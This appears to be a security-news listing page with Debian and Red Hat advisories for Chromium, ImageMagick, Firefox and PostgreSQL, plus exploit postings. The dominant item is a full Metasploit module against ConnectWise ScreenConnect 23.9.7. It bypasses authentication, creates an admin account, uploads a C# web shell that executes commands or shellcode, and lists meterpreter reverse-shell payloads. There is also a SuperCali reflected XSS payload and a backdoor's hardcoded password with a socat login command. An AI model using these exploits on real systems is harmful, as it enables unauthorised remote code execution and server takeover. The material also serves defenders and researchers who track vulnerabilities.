Debian Linux Security Advisory 5629-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA256- -------------------------------------------------------------------------Debian Security Advisory DSA-5629-1                   security@debian.orghttps://www.debian.org/security/                           Andres SalomonFebruary 23, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2024-1669 CVE-2024-1670 CVE-2024-1671 CVE-2024-1672                  CVE-2024-1673 CVE-2024-1674 CVE-2024-1675 CVE-2024-1676Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bookworm), these problems have been fixed inversion 122.0.6261.57-1~deb12u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCAAdFiEEUAUk+X1YiTIjs19qZF0CR8NudjcFAmXYNoEACgkQZF0CR8NudjcqXA//bWGEiwv3xiYCsDresz86tTt51gyCKz7ZKSKHC2t2McxigIZKroa+I0X2gCGVAMUXCUS8ws06l0MENOXAzSzs141geA+G+HZ0rLQsO0F8PyMNYYrLR+Dglc+j6+oOHhLyU9UmYi7M46NfzrmYde3D/EnNrKQr1LlYLSkjokeNnzkmS6WQekJUtnh+O7v0GQzgSNSxka5Pj/NwUbB0anRY3vYw4RGDuZS0RaWz6njbexBiYf+shHfm8c0ZppV788VJhhD1bI+G5jc6Y46Xc50J2CcU+EnaxfTcRQluGXMOgnpgUG74Vr6YfCp+5KYw6aOqCRLHVY5p+f4xiw20DpvzSRbFuDpy8o4pgd0lwwhfa7C/LmA9jnm6kzvMth/Ra0lLbSVax4COTxdqCxLMwgVVa/6IWXaW0Cp0SdouB5hstogayKuDizqwAd6+72ArNkAdUCxLNVlgUqjK2S2cVzfHPJQ0Mn3nAXV/9MZAqATYI1DY2ZdWYOsupAN2E/CST/uIOGBYStjERed3DinaC2EVA2QdZZPwQpOpZYuIiG9b4qQ7BXgEMjjZPvhUlmeTyYnNJp3+BfHEXgTCLrsCIitp57wD7BqIOyL2YY5wNE8VWk5Kk7ZCYbs3YV70RyHovB+BDAc/i5aYOrsGJ1mI5bLDMFZ0GT3gKin+BkzqfyC+7EU==b0l1-----END PGP SIGNATURE-----

Debian Security Advisory 5629-1

Backdoor.Win32.Armageddon.r malware suffers from a hardcoded credential vulnerability.

    Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2024Original source: https://malvuln.com/advisory/68d135936512e88cc0704b90bb3839e0.txtContact: malvuln13@gmail.comMedia: twitter.com/malvulnThreat: Backdoor.Win32.Armageddon.rVulnerability: Hardcoded Cleartext CredentialsDescription: The malware listens on TCP port 5859 and requires authentication. The password "KOrUPtIzEre" is stored in cleartext within the PE file at offset 0x4635f. Connecting to the backdoor returns the value "1" then enter the password.Family: ArmageddonType: PE32 MD5: 68d135936512e88cc0704b90bb3839e0Vuln ID: MVID-2024-0670Dropped files: IP-logs.txtDisclosure: 02/22/2024Exploit/PoC:root@kali:/home/kali# socat - TCP4:x.x.x.x:58591  KOrUPtIzEre1  DESKTOP-2C4IJHO  VICTIM   WedDisclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Armageddon.r MVID-2024-0670 Hardcoded Credential

Debian Linux Security Advisory 5628-1 - handling problems and cases of missing or incomplete input sanitising may result in denial of service, memory disclosure or potentially the execution of arbitrary code if malformed image files are processed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5628-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
February 22, 2024                     https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : imagemagick  
CVE ID         : CVE-2021-3610 CVE-2022-1115 CVE-2023-1289 CVE-2023-1906   
                 CVE-2023-3428 CVE-2023-5341 CVE-2023-34151  
Debian Bug     : 1013282 1036999

This update fixes multiple vulnerabilities in Imagemagick: Various memory  
handling problems and cases of missing or incomplete input sanitising  
may result in denial of service, memory disclosure or potentially the  
execution of arbitrary code if malformed image files are processed.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 8:6.9.11.60+dfsg-1.3+deb11u3.

For the stable distribution (bookworm), these problems have been fixed in  
version 8:6.9.11.60+dfsg-1.6+deb12u1.

We recommend that you upgrade your imagemagick packages.

For the detailed security status of imagemagick please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/imagemagick

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmXXmJoACgkQEMKTtsN8  
TjZ4oA//dcUTeog3Pl7y1vg7o0IRWkWMbHtamfOavzrUPt+r9LFc1B0HAxUhrtet  
r7svk5r2WlQjMjcANg19F1hVqGAx+WVKFz15ydmzugU7TWoudZdSyE0gcAQfW4mg  
UeiU+MnhcOyIfJJuV+EQD3JvsfLmRzMGG5WzDTkTbe+y78paXrskMY/y5vhSPlnR  
+3wyqdZ0R1urzoVpShj1fullrmTTUnTr3/kxTXm5S1LBjcMwpdMoRTFJBuOXlPSa  
jA+dDkpeer/UiBIH0piaUmxByG2BtzDGjvvi6BlohqvpERFrqfsb59+Scimi3arr  
vYHELehJTqM+jUvg3VehSGTFId6qsGVsM0eKUFtFMdlL016U34LICfP+FDlP1DJ0  
VKyab9UDyU6Zf7aWiVnJt6GQdicIQ64hsvVBuj3u90WcI63qR6RybuxmGhBfIJs+  
VkG23qv8DjrvRpFesUaTvbOfMOJ3q0OvXIF9TMx5CNimPuEc8esg2Ktzdoaiy7Vj  
gmNewYaGRqrLDLsK48pJx4qLz4WfvRLVZPWnKuyUaQaRsybsSdFx+r8id/utJ6sW  
6I8H9KouHflKPZhzccnMGHZJFD1H/DzQHAbCvUz8yKaA+OMU5RgcsGWawmRhavDW  
fXzfUyMSJYV57voszyQmrBMOSzQHi/f0SIBqFtK928ATLXHY/bs=  
=KFsb  
-----END PGP SIGNATURE-----

Debian Security Advisory 5628-1

This Metasploit module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage this to achieve remote code execution by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7 and below are affected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'ConnectWise ScreenConnect Unauthenticated Remote Code Execution',        'Description' => %q{          This module exploits an authentication bypass vulnerability that allows an unauthenticated attacker to create          a new administrator user account on a vulnerable ConnectWise ScreenConnect server. The attacker can leverage          this to achieve RCE by uploading a malicious extension module. All versions of ScreenConnect version 23.9.7          and below are affected.        },        'License' => MSF_LICENSE,        'Author' => [          'sfewer-r7', # MSF RCE Exploit          'WatchTowr', # Auth Bypass PoC        ],        'References' => [          ['CVE', '2024-1708'], # Path traversal when extracting zip file.          ['CVE', '2024-1709'], # Auth bypass to create admin account.          ['URL', 'https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8'], # Vendor Advisory          ['URL', 'https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc/'], #  Auth Bypass PoC          ['URL', 'https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass'] #  Analysis of both CVEs        ],        'DisclosureDate' => '2024-02-19',        'Platform' => %w[win linux unix],        'Arch' => [ARCH_X64, ARCH_CMD],        'Privileged' => true, # 'NT AUTHORITY\SYSTEM' on Windows, root on Linux.        'Targets' => [          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # windows/x64/meterpreter/reverse_tcp            'Windows In-Memory', {              'Platform' => 'win',              'Arch' => ARCH_X64            }          ],          [            # Tested ScreenConnect 23.9.7.8804 on Server 2022 with payloads:            # cmd/windows/http/x64/meterpreter/reverse_tcp            'Windows Command', {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'FETCH_WRITABLE_DIR' => '%TEMP%'              }            }          ],          [            # Tested ScreenConnect 20.3.31734 on Ubuntu 18.04.6 with payloads:            # cmd/linux/http/x64/meterpreter/reverse_tcp            # cmd/unix/reverse_bash            'Linux Command', {              'Platform' => %w[linux unix],              'Arch' => ARCH_CMD,              'DefaultOptions' => {                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ]        ],        'DefaultOptions' => {          'RPORT' => 8040,          'SSL' => false,          'EXITFUNC' => 'thread'        },        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [            IOC_IN_LOGS,            CONFIG_CHANGES,            # The existing administrator account will be replaced            ACCOUNT_LOCKOUTS          ]        }      )    )    register_options([      OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alpha_lower(8)]),      OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(16)])    ])  end  def check    # This is a file found on the recent 23.9.7.8804 (Circa 2024), an out of support 20.3.31734 (Circa 2021), and    # a very old 2.5.3409.4645 (Circa 2012). So we can expect this file to exist on all targets. As this endpoint    # expects authentication, the response will be a 302 redirect to the Login page. As Windows is case insensitive    # we can request 'Host.aspx' with any case and get the expected 302 response, however Linux is case sensitive and    # will always 404 a request to 'Host.aspx' if we jumble up the case. Both a 302 and 404 response will still include    # the Server header, which we use to confirm both ScreenConnect and the version number.    host_aspx = 'Host.aspx'    host_aspx = loop do      jumblecase_host_aspx = host_aspx.chars.map { |c| rand(2) == 0 ? c.upcase : c.downcase }.join      break jumblecase_host_aspx unless jumblecase_host_aspx == host_aspx    end    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, host_aspx)    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown("Received unexpected HTTP status code: #{res.code}.") unless res.code == 302 || res.code == 404    platform = res.code == 302 ? 'Windows' : 'Linux'    if res.headers.key?('Server') && (res.headers['Server'] =~ %r{ScreenConnect/(\d+\.\d+.\d+)})      detected = "ConnectWise ScreenConnect #{Regexp.last_match(1)} running on #{platform}."      if Rex::Version.new(Regexp.last_match(1)) <= Rex::Version.new('23.9.7')        return CheckCode::Appears(detected)      end      return CheckCode::Safe(detected)    end    CheckCode::Unknown  end  def exploit    # Sanity check the USERNAME and PASSWORD will meet the servers password requirements.    fail_with(Failure::BadConfig, 'USERNAME must not be empty.') if datastore['USERNAME'].empty?    fail_with(Failure::BadConfig, 'PASSWORD must be 8 characters of more.') if datastore['PASSWORD'].length < 8    #    # 1. Begin the setup wizard using the vulnerability to access the SetupWizard.aspx page.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/')    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply when initiating setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view state after initiating setup wizard.')    end    #    # 2. Advance to the next step in the setup.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$StartNavigationTemplateContainerID$StartNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from first step in setup wizard.')    end    viewstate, viewstategen = get_viewstate(res)    unless viewstate && viewstategen      fail_with(Failure::UnexpectedReply, 'Did not locate the view after first step in setup wizard.')    end    #    # 3. Create a new administrator account.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, '/SetupWizard.aspx/'),      'vars_post' => {        '__EVENTTARGET' => '',        '__EVENTARGUMENT' => '',        '__VIEWSTATE' => viewstate,        '__VIEWSTATEGENERATOR' => viewstategen,        'ctl00$Main$wizard$userNameBox' => datastore['USERNAME'],        'ctl00$Main$wizard$emailBox' => Faker::Internet.email(name: datastore['USERNAME']).to_s,        'ctl00$Main$wizard$passwordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$verifyPasswordBox' => datastore['PASSWORD'],        'ctl00$Main$wizard$StepNavigationTemplateContainerID$StepNextButton' => 'Next'      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply from create account step in setup wizard.')    end    print_status("Created account: #{datastore['USERNAME']}:#{datastore['PASSWORD']} (Note: This account will not be deleted by the module)")    #    # 4. Log in with this account to get an authenticated HTTP session.    #    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'Administration'),      'keep_cookies' => true,      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to login with admin credentials.')    end    if res.body =~ %r{"antiForgeryToken"\s*:\s*"([a-zA-Z0-9+/=]+)"}      anti_forgery_token = Regexp.last_match(1)    else      # The antiForgeryToken is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Could not locate anti forgery token after login with admin credentials.')      anti_forgery_token = ''    end    #    # 5. Create an extension to host the payload.    #    # NOTE: Rex::Text.rand_guid return a GUID string wrapped in curly braces which is not what we want, so we use    # Faker::Internet.uuid instead.    plugin_guid = Faker::Internet.uuid    payload_ashx = "#{Rex::Text.rand_text_alpha_lower(8)}.ashx"    # According to Microsoft (https://learn.microsoft.com/en-us/dotnet/csharp/language-reference/keywords/) these are    # the list of valid C# keywords, we create a Rex::RandomIdentifier::Generator to generate new identifiera for    # use in the ASHX payload, and pass the list of valid C# keywords as a forbidden list so we dont accidentaly    # generate a valid keyword.    vars = Rex::RandomIdentifier::Generator.new({      forbidden: %w[        abstract add alias and args as ascending async await        base bool break by byte case catch char checked class const continue decimal default delegate descending do        double dynamic else enum equals event explicit extern false file finally fixed float for foreach from get        global goto group if implicit in init int interface internal into is join let lock long managed nameof        namespace new nint not notnull nuint null object on operator or orderby out override params partial private        protected public readonly record ref remove required return sbyte scoped sealed select set short sizeof        stackalloc static string struct switch this throw true try typeof uint ulong unchecked unmanaged unsafe ushort        using value var virtual void volatile when where while with yield      ]    })    if target['Arch'] == ARCH_CMD      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;public class #{vars[:var_handler_class]} : IHttpHandler{  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    string #{vars[:var_payload]} = System.Text.Encoding.UTF8.GetString(#{vars[:var_bytearray]});    ProcessStartInfo #{vars[:var_psi]} = new ProcessStartInfo();    #{vars[:var_psi]}.FileName = "#{target['Platform'] == 'win' ? 'cmd.exe' : '/bin/sh'}";    #{vars[:var_psi]}.Arguments = "#{target['Platform'] == 'win' ? '/c' : '-c'} \\\"" + #{vars[:var_payload]} + "\\\"";    #{vars[:var_psi]}.RedirectStandardOutput = true;    #{vars[:var_psi]}.UseShellExecute = false;    Process.Start(#{vars[:var_psi]});  }  public bool IsReusable { get { return true; } }})    else      payload_data = %(<% @ WebHandler Language="C#" Class="#{vars[:var_handler_class]}" %>using System;using System.Web;using System.Diagnostics;using System.Runtime.InteropServices;public class #{vars[:var_handler_class]} : IHttpHandler{  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);  [System.Runtime.InteropServices.DllImport("kernel32")]  private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);  public void ProcessRequest(HttpContext #{vars[:var_ctx]})  {    if (String.IsNullOrEmpty(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"])) {      return;    }    byte[] #{vars[:var_bytearray]} = Convert.FromBase64String(#{vars[:var_ctx]}.Request["#{vars[:var_payload_key]}"]);    IntPtr #{vars[:var_func_addr]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{vars[:var_bytearray]}.Length, 0x3000, (IntPtr)0x40);    Marshal.Copy(#{vars[:var_bytearray]}, 0, #{vars[:var_func_addr]}, #{vars[:var_bytearray]}.Length);    IntPtr #{vars[:var_thread_id]} = IntPtr.Zero;    CreateThread(IntPtr.Zero, UIntPtr.Zero, #{vars[:var_func_addr]}, IntPtr.Zero, 0, ref #{vars[:var_thread_id]});  }  public bool IsReusable { get { return true; } }})    end    manifest_data = %(<?xml version="1.0" encoding="utf-8"?><ExtensionManifest>  <Version>#{Faker::App.version}</Version>  <Name>#{Faker::App.name}</Name>  <Author>#{Faker::Name.name}</Author>  <ShortDescription>#{Faker::Lorem.sentence}</ShortDescription>  <Components>    <WebServiceReference SourceFile="#{payload_ashx}"/>  </Components></ExtensionManifest>)    zip_resources = Rex::Zip::Archive.new    zip_resources.add_file("#{plugin_guid}/Manifest.xml", manifest_data)    # We can leverage CVE-2024-1708 to write one level below the extension directory. This enable Linux targets to work.    zip_resources.add_file("#{plugin_guid}/../#{payload_ashx}", payload_data)    #    # 6. Upload the payload extension.    #    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'InstallExtension'),      'keep_cookies' => true,      'ctype' => 'application/json',      'data' => "[\"#{Base64.strict_encode64(zip_resources.pack)}\"]",      'headers' => {        'X-Anti-Forgery-Token' => anti_forgery_token      }    )    unless res&.code == 200      fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to install extension.')    end    print_status("Uploaded Extension: #{plugin_guid}")    if target['Platform'] == 'win'      # On Windows the current working directory is C:\Windows\System32\ and we dont leak out the install path      # so we use the default installation location...      register_files_for_cleanup("C:\\Program Files (x86)\\ScreenConnect\\App_Extensions\\#{payload_ashx}")    else      # For Linux the current working is the install path (/opt/screenconnect) so we can use a relative path...      register_files_for_cleanup("App_Extensions/#{payload_ashx}")    end    begin      #      # 7. Trigger the payload by requesting the extensions .ashx file.      #      if target['Arch'] == ARCH_CMD        payload_data = payload.encoded.gsub('\\', '\\\\\\\\')      else        payload_data = payload.encoded      end      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'App_Extensions', payload_ashx),        'keep_cookies' => true,        'vars_post' => {          vars[:var_payload_key] => Base64.strict_encode64(payload_data)        }      )      unless res&.code == 200        fail_with(Failure::UnexpectedReply, 'Unexpected reply after attempt to trigger payload.')      end    ensure      #      # 8. Ensure we remove the extension when we are done.      #      print_status("Removing Extension: #{plugin_guid}")      res = send_request_cgi(        'method' => 'POST',        'uri' => normalize_uri(target_uri.path, 'Services', 'ExtensionService.ashx', 'UninstallExtension'),        'keep_cookies' => true,        'ctype' => 'application/json',        'data' => "[\"#{plugin_guid}\"]",        'headers' => {          'X-Anti-Forgery-Token' => anti_forgery_token        }      )      unless res&.code == 200        print_warning('Failed to remove the extension.')      end    end  end  def get_viewstate(res)    vs_input = res.get_html_document.at('input[name="__VIEWSTATE"]')    unless vs_input&.key? 'value'      print_error('Did not locate the __VIEWSTATE.')      return nil    end    vsgen_input = res.get_html_document.at('input[name="__VIEWSTATEGENERATOR"]')    unless vsgen_input&.key? 'value'      # The __VIEWSTATEGENERATOR is not present in older versions of ScreenConnect (Tested with 20.3.31734).      print_warning('Did not locate the __VIEWSTATEGENERATOR.')      return [vs_input['value'], '']    end    [vs_input['value'], vsgen_input['value']]  endend

ConnectWise ScreenConnect 23.9.7 Unauthenticated Remote Code Execution

SuperCali version 1.1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS# Date: 2024-23-02# Exploit Author: tmrswrr# Vendor Homepage: https://supercali.inforest.com# Version : 1.1.0# Tested on: https://softaculous.com/demos/supercali1 ) Go to admin login url :  https://127.0.0.1/SuperCali/login.php2 ) Write your payload admin place : "><img src=x onerrora=confirm() onerror=confirm(1)>3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1

SuperCali 1.1.0 Cross Site Scripting

Red Hat Security Advisory 2024-0952-03 - An update for firefox is now available for Red Hat Enterprise Linux 9. Issues addressed include a spoofing vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0952.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: firefox security update  
Advisory ID:        RHSA-2024:0952-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0952  
Issue date:         2024-02-22  
Revision:           03  
CVE Names:          CVE-2024-1546  
====================================================================

Summary: 

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.

This update upgrades Firefox to version 115.8.0 ESR.

Security Fix(es):

* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)

* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)

* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)

* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)

* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)

* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)

* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)

* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-1546

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2265349  
https://bugzilla.redhat.com/show_bug.cgi?id=2265350  
https://bugzilla.redhat.com/show_bug.cgi?id=2265351  
https://bugzilla.redhat.com/show_bug.cgi?id=2265352  
https://bugzilla.redhat.com/show_bug.cgi?id=2265353  
https://bugzilla.redhat.com/show_bug.cgi?id=2265354  
https://bugzilla.redhat.com/show_bug.cgi?id=2265355  
https://bugzilla.redhat.com/show_bug.cgi?id=2265356

Red Hat Security Advisory 2024-0952-03

Red Hat Security Advisory 2024-0951-03 - An update for postgresql is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0951.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2024:0951-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0951Issue date:         2024-02-22Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0951-03

Red Hat Security Advisory 2024-0950-03 - An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0950.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql:15 security updateAdvisory ID:        RHSA-2024:0950-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0950Issue date:         2024-02-22Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for the postgresql:15 module is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-0950-03

In this paper, the authors show that the design of DNSSEC is flawed. Exploiting vulnerable recommendations in the DNSSEC standards, they developed a new class of DNSSEC-based algorithmic complexity attacks on DNS, they dubbed KeyTrap attacks. All popular DNS implementations and services are vulnerable. With just a single DNS packet, the KeyTrap attacks lead to a 2.000.000x spike in CPU instruction count in vulnerable DNS resolvers, stalling some for as long as 16 hours. This devastating effect prompted major DNS vendors to refer to KeyTrap as "the worst attack on DNS ever discovered". Exploiting KeyTrap, an attacker could effectively disable Internet access in any system utilizing a DNSSEC-validating resolver.

The KeyTrap Denial-of-Service Algorithmic Complexity Attacks On DNS

Debian Linux Security Advisory 5627-1 - Multiple security issues have been found in the Mozilla Firefox web browser, which could potentially result in the execution of arbitrary code, information disclosure or spoofing.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5627-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 21, 2024                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-1546 CVE-2024-1547 CVE-2024-1548 CVE-2024-1549                  CVE-2024-1550 CVE-2024-1551 CVE-2024-1552 CVE-2024-1553Multiple security issues have been found in the Mozilla Firefox webbrowser, which could potentially result in the execution of arbitrarycode, information disclosure or spoofing.For the oldstable distribution (bullseye), these problems have been fixedin version 115.8.0esr-1~deb11u1.For the stable distribution (bookworm), these problems have been fixed inversion 115.8.0esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP 